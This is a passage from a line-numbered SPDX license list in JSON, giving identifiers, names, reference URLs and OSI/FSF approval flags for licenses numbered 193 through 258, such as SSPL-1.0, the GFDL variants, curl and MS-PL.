2409 "detailsUrl": "https://spdx.org/licenses/SCEA.json",
2410 "referenceNumber": 193,
2411 "name": "SCEA Shared Source License",
2412 "licenseId": "SCEA",
2413 "seeAlso": [
2414 "http://research.scea.com/scea_shared_source_license.html"
2415 ],
2416 "isOsiApproved": false
2417 },
2418 {
2419 "reference": "https://spdx.org/licenses/Latex2e.html",
2420 "isDeprecatedLicenseId": false,
2421 "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
2422 "referenceNumber": 194,
2423 "name": "Latex2e License",
2424 "licenseId": "Latex2e",
2425 "seeAlso": [
2426 "https://fedoraproject.org/wiki/Licensing/Latex2e"
2427 ],
2428 "isOsiApproved": false
2429 },
2430 {
2431 "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
2432 "isDeprecatedLicenseId": false,
2433 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
2434 "referenceNumber": 195,
2435 "name": "Artistic License 1.0 w/clause 8",
2436 "licenseId": "Artistic-1.0-cl8",
2437 "seeAlso": [
2438 "https://opensource.org/licenses/Artistic-1.0"
2439 ],
2440 "isOsiApproved": true
2441 },
2442 {
2443 "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
2444 "isDeprecatedLicenseId": false,
2445 "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
2446 "referenceNumber": 196,
2447 "name": "SGI Free Software License B v1.1",
2448 "licenseId": "SGI-B-1.1",
2449 "seeAlso": [
2450 "http://oss.sgi.com/projects/FreeB/"
2451 ],
2452 "isOsiApproved": false
2453 },
2454 {
2455 "reference": "https://spdx.org/licenses/NRL.html",
2456 "isDeprecatedLicenseId": false,
2457 "detailsUrl": "https://spdx.org/licenses/NRL.json",
2458 "referenceNumber": 197,
2459 "name": "NRL License",
2460 "licenseId": "NRL",
2461 "seeAlso": [
2462 "http://web.mit.edu/network/isakmp/nrllicense.html"
2463 ],
2464 "isOsiApproved": false
2465 },
2466 {
2467 "reference": "https://spdx.org/licenses/SWL.html",
2468 "isDeprecatedLicenseId": false,
2469 "detailsUrl": "https://spdx.org/licenses/SWL.json",
2470 "referenceNumber": 198,
2471 "name": "Scheme Widget Library (SWL) Software License Agreement",
2472 "licenseId": "SWL",
2473 "seeAlso": [
2474 "https://fedoraproject.org/wiki/Licensing/SWL"
2475 ],
2476 "isOsiApproved": false
2477 },
2478 {
2479 "reference": "https://spdx.org/licenses/Zed.html",
2480 "isDeprecatedLicenseId": false,
2481 "detailsUrl": "https://spdx.org/licenses/Zed.json",
2482 "referenceNumber": 199,
2483 "name": "Zed License",
2484 "licenseId": "Zed",
2485 "seeAlso": [
2486 "https://fedoraproject.org/wiki/Licensing/Zed"
2487 ],
2488 "isOsiApproved": false
2489 },
2490 {
2491 "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
2492 "isDeprecatedLicenseId": false,
2493 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
2494 "referenceNumber": 200,
2495 "name": "CERN Open Hardware Licence v1.1",
2496 "licenseId": "CERN-OHL-1.1",
2497 "seeAlso": [
2498 "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
2499 ],
2500 "isOsiApproved": false
2501 },
2502 {
2503 "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
2504 "isDeprecatedLicenseId": false,
2505 "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
2506 "referenceNumber": 201,
2507 "name": "Red Hat eCos Public License v1.1",
2508 "licenseId": "RHeCos-1.1",
2509 "seeAlso": [
2510 "http://ecos.sourceware.org/old-license.html"
2511 ],
2512 "isOsiApproved": false
2513 },
2514 {
2515 "reference": "https://spdx.org/licenses/JasPer-2.0.html",
2516 "isDeprecatedLicenseId": false,
2517 "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
2518 "referenceNumber": 202,
2519 "name": "JasPer License",
2520 "licenseId": "JasPer-2.0",
2521 "seeAlso": [
2522 "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
2523 ],
2524 "isOsiApproved": false
2525 },
2526 {
2527 "reference": "https://spdx.org/licenses/SSPL-1.0.html",
2528 "isDeprecatedLicenseId": false,
2529 "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
2530 "referenceNumber": 203,
2531 "name": "Server Side Public License, v 1",
2532 "licenseId": "SSPL-1.0",
2533 "seeAlso": [
2534 "https://www.mongodb.com/licensing/server-side-public-license"
2535 ],
2536 "isOsiApproved": false
2537 },
2538 {
2539 "reference": "https://spdx.org/licenses/GPL-2.0+.html",
2540 "isDeprecatedLicenseId": true,
2541 "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
2542 "referenceNumber": 204,
2543 "name": "GNU General Public License v2.0 or later",
2544 "licenseId": "GPL-2.0+",
2545 "seeAlso": [
2546 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
2547 "https://opensource.org/licenses/GPL-2.0"
2548 ],
2549 "isOsiApproved": true
2550 },
2551 {
2552 "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
2553 "isDeprecatedLicenseId": false,
2554 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
2555 "referenceNumber": 205,
2556 "name": "Open LDAP Public License v1.4",
2557 "licenseId": "OLDAP-1.4",
2558 "seeAlso": [
2559 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
2560 ],
2561 "isOsiApproved": false
2562 },
2563 {
2564 "reference": "https://spdx.org/licenses/libpng-2.0.html",
2565 "isDeprecatedLicenseId": false,
2566 "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
2567 "referenceNumber": 206,
2568 "name": "PNG Reference Library version 2",
2569 "licenseId": "libpng-2.0",
2570 "seeAlso": [
2571 "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
2572 ],
2573 "isOsiApproved": false
2574 },
2575 {
2576 "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
2577 "isDeprecatedLicenseId": false,
2578 "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
2579 "referenceNumber": 207,
2580 "name": "CNRI Python Open Source GPL Compatible License Agreement",
2581 "licenseId": "CNRI-Python-GPL-Compatible",
2582 "seeAlso": [
2583 "http://www.python.org/download/releases/1.6.1/download_win/"
2584 ],
2585 "isOsiApproved": false
2586 },
2587 {
2588 "reference": "https://spdx.org/licenses/Aladdin.html",
2589 "isDeprecatedLicenseId": false,
2590 "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
2591 "referenceNumber": 208,
2592 "name": "Aladdin Free Public License",
2593 "licenseId": "Aladdin",
2594 "seeAlso": [
2595 "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
2596 ],
2597 "isOsiApproved": false
2598 },
2599 {
2600 "reference": "https://spdx.org/licenses/CECILL-1.0.html",
2601 "isDeprecatedLicenseId": false,
2602 "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
2603 "referenceNumber": 209,
2604 "name": "CeCILL Free Software License Agreement v1.0",
2605 "licenseId": "CECILL-1.0",
2606 "seeAlso": [
2607 "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
2608 ],
2609 "isOsiApproved": false
2610 },
2611 {
2612 "reference": "https://spdx.org/licenses/Ruby.html",
2613 "isDeprecatedLicenseId": false,
2614 "detailsUrl": "https://spdx.org/licenses/Ruby.json",
2615 "referenceNumber": 210,
2616 "name": "Ruby License",
2617 "licenseId": "Ruby",
2618 "seeAlso": [
2619 "http://www.ruby-lang.org/en/LICENSE.txt"
2620 ],
2621 "isOsiApproved": false,
2622 "isFsfLibre": true
2623 },
2624 {
2625 "reference": "https://spdx.org/licenses/NPL-1.1.html",
2626 "isDeprecatedLicenseId": false,
2627 "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
2628 "referenceNumber": 211,
2629 "name": "Netscape Public License v1.1",
2630 "licenseId": "NPL-1.1",
2631 "seeAlso": [
2632 "http://www.mozilla.org/MPL/NPL/1.1/"
2633 ],
2634 "isOsiApproved": false,
2635 "isFsfLibre": true
2636 },
2637 {
2638 "reference": "https://spdx.org/licenses/ImageMagick.html",
2639 "isDeprecatedLicenseId": false,
2640 "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
2641 "referenceNumber": 212,
2642 "name": "ImageMagick License",
2643 "licenseId": "ImageMagick",
2644 "seeAlso": [
2645 "http://www.imagemagick.org/script/license.php"
2646 ],
2647 "isOsiApproved": false
2648 },
2649 {
2650 "reference": "https://spdx.org/licenses/Cube.html",
2651 "isDeprecatedLicenseId": false,
2652 "detailsUrl": "https://spdx.org/licenses/Cube.json",
2653 "referenceNumber": 213,
2654 "name": "Cube License",
2655 "licenseId": "Cube",
2656 "seeAlso": [
2657 "https://fedoraproject.org/wiki/Licensing/Cube"
2658 ],
2659 "isOsiApproved": false
2660 },
2661 {
2662 "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
2663 "isDeprecatedLicenseId": false,
2664 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
2665 "referenceNumber": 214,
2666 "name": "GNU Free Documentation License v1.1 only",
2667 "licenseId": "GFDL-1.1-only",
2668 "seeAlso": [
2669 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
2670 ],
2671 "isOsiApproved": false,
2672 "isFsfLibre": true
2673 },
2674 {
2675 "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
2676 "isDeprecatedLicenseId": false,
2677 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
2678 "referenceNumber": 215,
2679 "name": "Creative Commons Attribution 2.0 Generic",
2680 "licenseId": "CC-BY-2.0",
2681 "seeAlso": [
2682 "https://creativecommons.org/licenses/by/2.0/legalcode"
2683 ],
2684 "isOsiApproved": false
2685 },
2686 {
2687 "reference": "https://spdx.org/licenses/AFL-1.2.html",
2688 "isDeprecatedLicenseId": false,
2689 "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
2690 "referenceNumber": 216,
2691 "name": "Academic Free License v1.2",
2692 "licenseId": "AFL-1.2",
2693 "seeAlso": [
2694 "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
2695 "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
2696 ],
2697 "isOsiApproved": true,
2698 "isFsfLibre": true
2699 },
2700 {
2701 "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
2702 "isDeprecatedLicenseId": false,
2703 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
2704 "referenceNumber": 217,
2705 "name": "Creative Commons Attribution Share Alike 2.0 Generic",
2706 "licenseId": "CC-BY-SA-2.0",
2707 "seeAlso": [
2708 "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
2709 ],
2710 "isOsiApproved": false
2711 },
2712 {
2713 "reference": "https://spdx.org/licenses/CECILL-2.0.html",
2714 "isDeprecatedLicenseId": false,
2715 "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
2716 "referenceNumber": 218,
2717 "name": "CeCILL Free Software License Agreement v2.0",
2718 "licenseId": "CECILL-2.0",
2719 "seeAlso": [
2720 "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
2721 ],
2722 "isOsiApproved": false,
2723 "isFsfLibre": true
2724 },
2725 {
2726 "reference": "https://spdx.org/licenses/MIT-advertising.html",
2727 "isDeprecatedLicenseId": false,
2728 "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
2729 "referenceNumber": 219,
2730 "name": "Enlightenment License (e16)",
2731 "licenseId": "MIT-advertising",
2732 "seeAlso": [
2733 "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
2734 ],
2735 "isOsiApproved": false
2736 },
2737 {
2738 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
2739 "isDeprecatedLicenseId": false,
2740 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
2741 "referenceNumber": 220,
2742 "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
2743 "licenseId": "CC-BY-NC-SA-2.5",
2744 "seeAlso": [
2745 "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
2746 ],
2747 "isOsiApproved": false
2748 },
2749 {
2750 "reference": "https://spdx.org/licenses/Artistic-1.0.html",
2751 "isDeprecatedLicenseId": false,
2752 "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
2753 "referenceNumber": 221,
2754 "name": "Artistic License 1.0",
2755 "licenseId": "Artistic-1.0",
2756 "seeAlso": [
2757 "https://opensource.org/licenses/Artistic-1.0"
2758 ],
2759 "isOsiApproved": true
2760 },
2761 {
2762 "reference": "https://spdx.org/licenses/OSL-3.0.html",
2763 "isDeprecatedLicenseId": false,
2764 "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
2765 "referenceNumber": 222,
2766 "name": "Open Software License 3.0",
2767 "licenseId": "OSL-3.0",
2768 "seeAlso": [
2769 "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
2770 "https://opensource.org/licenses/OSL-3.0"
2771 ],
2772 "isOsiApproved": true,
2773 "isFsfLibre": true
2774 },
2775 {
2776 "reference": "https://spdx.org/licenses/X11.html",
2777 "isDeprecatedLicenseId": false,
2778 "detailsUrl": "https://spdx.org/licenses/X11.json",
2779 "referenceNumber": 223,
2780 "name": "X11 License",
2781 "licenseId": "X11",
2782 "seeAlso": [
2783 "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
2784 ],
2785 "isOsiApproved": false,
2786 "isFsfLibre": true
2787 },
2788 {
2789 "reference": "https://spdx.org/licenses/Bahyph.html",
2790 "isDeprecatedLicenseId": false,
2791 "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
2792 "referenceNumber": 224,
2793 "name": "Bahyph License",
2794 "licenseId": "Bahyph",
2795 "seeAlso": [
2796 "https://fedoraproject.org/wiki/Licensing/Bahyph"
2797 ],
2798 "isOsiApproved": false
2799 },
2800 {
2801 "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
2802 "isDeprecatedLicenseId": false,
2803 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
2804 "referenceNumber": 225,
2805 "name": "Open LDAP Public License v2.0.1",
2806 "licenseId": "OLDAP-2.0.1",
2807 "seeAlso": [
2808 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
2809 ],
2810 "isOsiApproved": false
2811 },
2812 {
2813 "reference": "https://spdx.org/licenses/EUDatagrid.html",
2814 "isDeprecatedLicenseId": false,
2815 "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
2816 "referenceNumber": 226,
2817 "name": "EU DataGrid Software License",
2818 "licenseId": "EUDatagrid",
2819 "seeAlso": [
2820 "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
2821 "https://opensource.org/licenses/EUDatagrid"
2822 ],
2823 "isOsiApproved": true,
2824 "isFsfLibre": true
2825 },
2826 {
2827 "reference": "https://spdx.org/licenses/MTLL.html",
2828 "isDeprecatedLicenseId": false,
2829 "detailsUrl": "https://spdx.org/licenses/MTLL.json",
2830 "referenceNumber": 227,
2831 "name": "Matrix Template Library License",
2832 "licenseId": "MTLL",
2833 "seeAlso": [
2834 "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
2835 ],
2836 "isOsiApproved": false
2837 },
2838 {
2839 "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
2840 "isDeprecatedLicenseId": false,
2841 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
2842 "referenceNumber": 228,
2843 "name": "GNU Free Documentation License v1.2 only - invariants",
2844 "licenseId": "GFDL-1.2-invariants-only",
2845 "seeAlso": [
2846 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
2847 ],
2848 "isOsiApproved": false
2849 },
2850 {
2851 "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
2852 "isDeprecatedLicenseId": false,
2853 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
2854 "referenceNumber": 229,
2855 "name": "GNU Free Documentation License v1.3 or later - no invariants",
2856 "licenseId": "GFDL-1.3-no-invariants-or-later",
2857 "seeAlso": [
2858 "https://www.gnu.org/licenses/fdl-1.3.txt"
2859 ],
2860 "isOsiApproved": false
2861 },
2862 {
2863 "reference": "https://spdx.org/licenses/curl.html",
2864 "isDeprecatedLicenseId": false,
2865 "detailsUrl": "https://spdx.org/licenses/curl.json",
2866 "referenceNumber": 230,
2867 "name": "curl License",
2868 "licenseId": "curl",
2869 "seeAlso": [
2870 "https://github.com/bagder/curl/blob/master/COPYING"
2871 ],
2872 "isOsiApproved": false
2873 },
2874 {
2875 "reference": "https://spdx.org/licenses/LAL-1.3.html",
2876 "isDeprecatedLicenseId": false,
2877 "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
2878 "referenceNumber": 231,
2879 "name": "Licence Art Libre 1.3",
2880 "licenseId": "LAL-1.3",
2881 "seeAlso": [
2882 "https://artlibre.org/"
2883 ],
2884 "isOsiApproved": false
2885 },
2886 {
2887 "reference": "https://spdx.org/licenses/DSDP.html",
2888 "isDeprecatedLicenseId": false,
2889 "detailsUrl": "https://spdx.org/licenses/DSDP.json",
2890 "referenceNumber": 232,
2891 "name": "DSDP License",
2892 "licenseId": "DSDP",
2893 "seeAlso": [
2894 "https://fedoraproject.org/wiki/Licensing/DSDP"
2895 ],
2896 "isOsiApproved": false
2897 },
2898 {
2899 "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
2900 "isDeprecatedLicenseId": false,
2901 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
2902 "referenceNumber": 233,
2903 "name": "CERN Open Hardware Licence v1.2",
2904 "licenseId": "CERN-OHL-1.2",
2905 "seeAlso": [
2906 "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
2907 ],
2908 "isOsiApproved": false
2909 },
2910 {
2911 "reference": "https://spdx.org/licenses/TOSL.html",
2912 "isDeprecatedLicenseId": false,
2913 "detailsUrl": "https://spdx.org/licenses/TOSL.json",
2914 "referenceNumber": 234,
2915 "name": "Trusster Open Source License",
2916 "licenseId": "TOSL",
2917 "seeAlso": [
2918 "https://fedoraproject.org/wiki/Licensing/TOSL"
2919 ],
2920 "isOsiApproved": false
2921 },
2922 {
2923 "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
2924 "isDeprecatedLicenseId": true,
2925 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
2926 "referenceNumber": 235,
2927 "name": "GNU General Public License v3.0 w/Autoconf exception",
2928 "licenseId": "GPL-3.0-with-autoconf-exception",
2929 "seeAlso": [
2930 "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
2931 ],
2932 "isOsiApproved": false
2933 },
2934 {
2935 "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
2936 "isDeprecatedLicenseId": false,
2937 "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
2938 "referenceNumber": 236,
2939 "name": "Creative Commons Attribution 3.0 Unported",
2940 "licenseId": "CC-BY-3.0",
2941 "seeAlso": [
2942 "https://creativecommons.org/licenses/by/3.0/legalcode"
2943 ],
2944 "isOsiApproved": false
2945 },
2946 {
2947 "reference": "https://spdx.org/licenses/Qhull.html",
2948 "isDeprecatedLicenseId": false,
2949 "detailsUrl": "https://spdx.org/licenses/Qhull.json",
2950 "referenceNumber": 237,
2951 "name": "Qhull License",
2952 "licenseId": "Qhull",
2953 "seeAlso": [
2954 "https://fedoraproject.org/wiki/Licensing/Qhull"
2955 ],
2956 "isOsiApproved": false
2957 },
2958 {
2959 "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
2960 "isDeprecatedLicenseId": false,
2961 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
2962 "referenceNumber": 238,
2963 "name": "GNU Free Documentation License v1.3 only - no invariants",
2964 "licenseId": "GFDL-1.3-no-invariants-only",
2965 "seeAlso": [
2966 "https://www.gnu.org/licenses/fdl-1.3.txt"
2967 ],
2968 "isOsiApproved": false
2969 },
2970 {
2971 "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
2972 "isDeprecatedLicenseId": false,
2973 "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
2974 "referenceNumber": 239,
2975 "name": "TORQUE v2.5+ Software License v1.1",
2976 "licenseId": "TORQUE-1.1",
2977 "seeAlso": [
2978 "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
2979 ],
2980 "isOsiApproved": false
2981 },
2982 {
2983 "reference": "https://spdx.org/licenses/MS-PL.html",
2984 "isDeprecatedLicenseId": false,
2985 "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
2986 "referenceNumber": 240,
2987 "name": "Microsoft Public License",
2988 "licenseId": "MS-PL",
2989 "seeAlso": [
2990 "http://www.microsoft.com/opensource/licenses.mspx",
2991 "https://opensource.org/licenses/MS-PL"
2992 ],
2993 "isOsiApproved": true,
2994 "isFsfLibre": true
2995 },
2996 {
2997 "reference": "https://spdx.org/licenses/Apache-1.0.html",
2998 "isDeprecatedLicenseId": false,
2999 "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
3000 "referenceNumber": 241,
3001 "name": "Apache License 1.0",
3002 "licenseId": "Apache-1.0",
3003 "seeAlso": [
3004 "http://www.apache.org/licenses/LICENSE-1.0"
3005 ],
3006 "isOsiApproved": false,
3007 "isFsfLibre": true
3008 },
3009 {
3010 "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
3011 "isDeprecatedLicenseId": false,
3012 "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
3013 "referenceNumber": 242,
3014 "name": "copyleft-next 0.3.1",
3015 "licenseId": "copyleft-next-0.3.1",
3016 "seeAlso": [
3017 "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
3018 ],
3019 "isOsiApproved": false
3020 },
3021 {
3022 "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
3023 "isDeprecatedLicenseId": false,
3024 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
3025 "referenceNumber": 243,
3026 "name": "GNU Free Documentation License v1.2 or later",
3027 "licenseId": "GFDL-1.2-or-later",
3028 "seeAlso": [
3029 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
3030 ],
3031 "isOsiApproved": false,
3032 "isFsfLibre": true
3033 },
3034 {
3035 "reference": "https://spdx.org/licenses/GPL-3.0+.html",
3036 "isDeprecatedLicenseId": true,
3037 "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
3038 "referenceNumber": 244,
3039 "name": "GNU General Public License v3.0 or later",
3040 "licenseId": "GPL-3.0+",
3041 "seeAlso": [
3042 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3043 "https://opensource.org/licenses/GPL-3.0"
3044 ],
3045 "isOsiApproved": true
3046 },
3047 {
3048 "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
3049 "isDeprecatedLicenseId": false,
3050 "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
3051 "referenceNumber": 245,
3052 "name": "Mulan Permissive Software License, Version 2",
3053 "licenseId": "MulanPSL-2.0",
3054 "seeAlso": [
3055 "https://license.coscl.org.cn/MulanPSL2/"
3056 ],
3057 "isOsiApproved": true
3058 },
3059 {
3060 "reference": "https://spdx.org/licenses/FSFAP.html",
3061 "isDeprecatedLicenseId": false,
3062 "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
3063 "referenceNumber": 246,
3064 "name": "FSF All Permissive License",
3065 "licenseId": "FSFAP",
3066 "seeAlso": [
3067 "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
3068 ],
3069 "isOsiApproved": false,
3070 "isFsfLibre": true
3071 },
3072 {
3073 "reference": "https://spdx.org/licenses/Xerox.html",
3074 "isDeprecatedLicenseId": false,
3075 "detailsUrl": "https://spdx.org/licenses/Xerox.json",
3076 "referenceNumber": 247,
3077 "name": "Xerox License",
3078 "licenseId": "Xerox",
3079 "seeAlso": [
3080 "https://fedoraproject.org/wiki/Licensing/Xerox"
3081 ],
3082 "isOsiApproved": false
3083 },
3084 {
3085 "reference": "https://spdx.org/licenses/CDDL-1.0.html",
3086 "isDeprecatedLicenseId": false,
3087 "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
3088 "referenceNumber": 248,
3089 "name": "Common Development and Distribution License 1.0",
3090 "licenseId": "CDDL-1.0",
3091 "seeAlso": [
3092 "https://opensource.org/licenses/cddl1"
3093 ],
3094 "isOsiApproved": true,
3095 "isFsfLibre": true
3096 },
3097 {
3098 "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
3099 "isDeprecatedLicenseId": false,
3100 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
3101 "referenceNumber": 249,
3102 "name": "GNU Free Documentation License v1.3 only - invariants",
3103 "licenseId": "GFDL-1.3-invariants-only",
3104 "seeAlso": [
3105 "https://www.gnu.org/licenses/fdl-1.3.txt"
3106 ],
3107 "isOsiApproved": false
3108 },
3109 {
3110 "reference": "https://spdx.org/licenses/etalab-2.0.html",
3111 "isDeprecatedLicenseId": false,
3112 "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
3113 "referenceNumber": 250,
3114 "name": "Etalab Open License 2.0",
3115 "licenseId": "etalab-2.0",
3116 "seeAlso": [
3117 "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
3118 "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
3119 ],
3120 "isOsiApproved": false
3121 },
3122 {
3123 "reference": "https://spdx.org/licenses/XFree86-1.1.html",
3124 "isDeprecatedLicenseId": false,
3125 "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
3126 "referenceNumber": 251,
3127 "name": "XFree86 License 1.1",
3128 "licenseId": "XFree86-1.1",
3129 "seeAlso": [
3130 "http://www.xfree86.org/current/LICENSE4.html"
3131 ],
3132 "isOsiApproved": false,
3133 "isFsfLibre": true
3134 },
3135 {
3136 "reference": "https://spdx.org/licenses/SNIA.html",
3137 "isDeprecatedLicenseId": false,
3138 "detailsUrl": "https://spdx.org/licenses/SNIA.json",
3139 "referenceNumber": 252,
3140 "name": "SNIA Public License 1.1",
3141 "licenseId": "SNIA",
3142 "seeAlso": [
3143 "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
3144 ],
3145 "isOsiApproved": false
3146 },
3147 {
3148 "reference": "https://spdx.org/licenses/LPPL-1.1.html",
3149 "isDeprecatedLicenseId": false,
3150 "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
3151 "referenceNumber": 253,
3152 "name": "LaTeX Project Public License v1.1",
3153 "licenseId": "LPPL-1.1",
3154 "seeAlso": [
3155 "http://www.latex-project.org/lppl/lppl-1-1.txt"
3156 ],
3157 "isOsiApproved": false
3158 },
3159 {
3160 "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
3161 "isDeprecatedLicenseId": false,
3162 "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
3163 "referenceNumber": 254,
3164 "name": "Computer Associates Trusted Open Source License 1.1",
3165 "licenseId": "CATOSL-1.1",
3166 "seeAlso": [
3167 "https://opensource.org/licenses/CATOSL-1.1"
3168 ],
3169 "isOsiApproved": true
3170 },
3171 {
3172 "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
3173 "isDeprecatedLicenseId": false,
3174 "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
3175 "referenceNumber": 255,
3176 "name": "Technische Universitaet Berlin License 2.0",
3177 "licenseId": "TU-Berlin-2.0",
3178 "seeAlso": [
3179 "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
3180 ],
3181 "isOsiApproved": false
3182 },
3183 {
3184 "reference": "https://spdx.org/licenses/GFDL-1.3.html",
3185 "isDeprecatedLicenseId": true,
3186 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
3187 "referenceNumber": 256,
3188 "name": "GNU Free Documentation License v1.3",
3189 "licenseId": "GFDL-1.3",
3190 "seeAlso": [
3191 "https://www.gnu.org/licenses/fdl-1.3.txt"
3192 ],
3193 "isOsiApproved": false,
3194 "isFsfLibre": true
3195 },
3196 {
3197 "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
3198 "isDeprecatedLicenseId": false,
3199 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
3200 "referenceNumber": 257,
3201 "name": "GNU Free Documentation License v1.3 or later",
3202 "licenseId": "GFDL-1.3-or-later",
3203 "seeAlso": [
3204 "https://www.gnu.org/licenses/fdl-1.3.txt"
3205 ],
3206 "isOsiApproved": false,
3207 "isFsfLibre": true
3208 },
3209 {
3210 "reference": "https://spdx.org/licenses/LAL-1.2.html",
3211 "isDeprecatedLicenseId": false,
3212 "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
3213 "referenceNumber": 258,
3214 "name": "Licence Art Libre 1.2",
3215 "licenseId": "LAL-1.2",
3216 "seeAlso": [
3217 "http://artlibre.org/licence/lal/licence-art-libre-12/"
3218 ],
3219 "isOsiApproved": false
3220 },
3221 {
